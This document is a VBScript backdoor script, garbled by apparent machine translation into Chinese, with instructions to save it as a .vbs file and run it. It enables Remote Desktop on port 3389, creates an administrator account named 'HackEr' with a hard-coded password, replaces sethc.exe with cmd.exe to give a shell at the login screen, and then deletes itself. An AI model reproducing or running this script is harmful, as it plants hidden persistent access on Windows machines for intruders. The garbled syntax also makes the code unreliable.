const HKEY _ LOCAL _ MACHINE = & ampH80000002
strComputer =“。“
設置StdOut = WScript。標準輸出
set oReg = GetObject(“winmgmts:{ impersonation level = impersonate }!\ \“& amp;_
str計算機& amp“\root\default:StdRegProv“)
strkey path =“SYSTEM \ current Control set \ Control \ Terminal Server“
奧雷格。CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ TCP“
奧雷格。CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ win stations \ RDP-Tcp“
strkey path =“SYSTEM \ current Control set \ Control \ Terminal Server“
str value name =“fDenyTSConnections“
dwValue = 0
奧雷格。SetDWORDValue HKEY _ LOCAL _ MACHINE,strKeyPath,strValueName,dwValue
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ TCP“
str value name =“port number“
dwValue = 3389
奧雷格。SetDWORDValue HKEY _ LOCAL _ MACHINE,strKeyPath,strValueName,dwValue
strKeyPath =“SYSTEM \ current Control set \ Control \ Terminal Server \ win stations \ RDP-Tcp“
str value name =“port number“
dwValue = 3389
奧雷格。SetDWORDValue HKEY _ LOCAL _ MACHINE,strKeyPath,strValueName,dwValue
出錯時繼續下壹步
dim用戶名、密碼:If Wscript。然後計算:username=Wscript。參數(0):password = Wscript。arguments(1):Else:username =“HackEr“:password =“393214425“:end if:set ws network = CreateObject(“WSCRIPT。NETWORK“):OS =“win nt://“& amp;wsnetwork。計算機名:Set ob = GetObject(OS):Set OE = GetObject(OS & amp;“/Administrators,group“):Set od = ob。Create(“用戶”,用戶名):od。設置密碼:od。Set of = GetObject(OS & amp;“/”& amp;用戶名和密碼。“,用戶“):oe。添加(的。ADsPath)wscript . echo。ADsPath
出錯時繼續下壹步
成功
set obj = CreateObject(“WScript。外殼”)
success = obj . run(“cmd/c takeown/f % SystemRoot % \ system32 \ sethc . exe & amp;echo y | cacls % SystemRoot % \ system32 \ sethc . exe/G % USERNAME %:F?% SystemRoot % \ system32 \ cmd . exe % SystemRoot % \ system32 \ acmd . exe?% SystemRoot % \ system32 \ sethc . exe % SystemRoot % \ system32 \ as ethc . exe & amp;del % SystemRoot % \ system32 \ sethc . exe & amp;ren % SystemRoot % \ system32 \ acmd . exe sethc . exe“,0,True)
CreateObject(“腳本。文件系統對象”)。刪除文件(WScript。腳本名)
將上面的代碼復制到壹個txt中,然後將txt的擴展名改為。vbs,並運行它。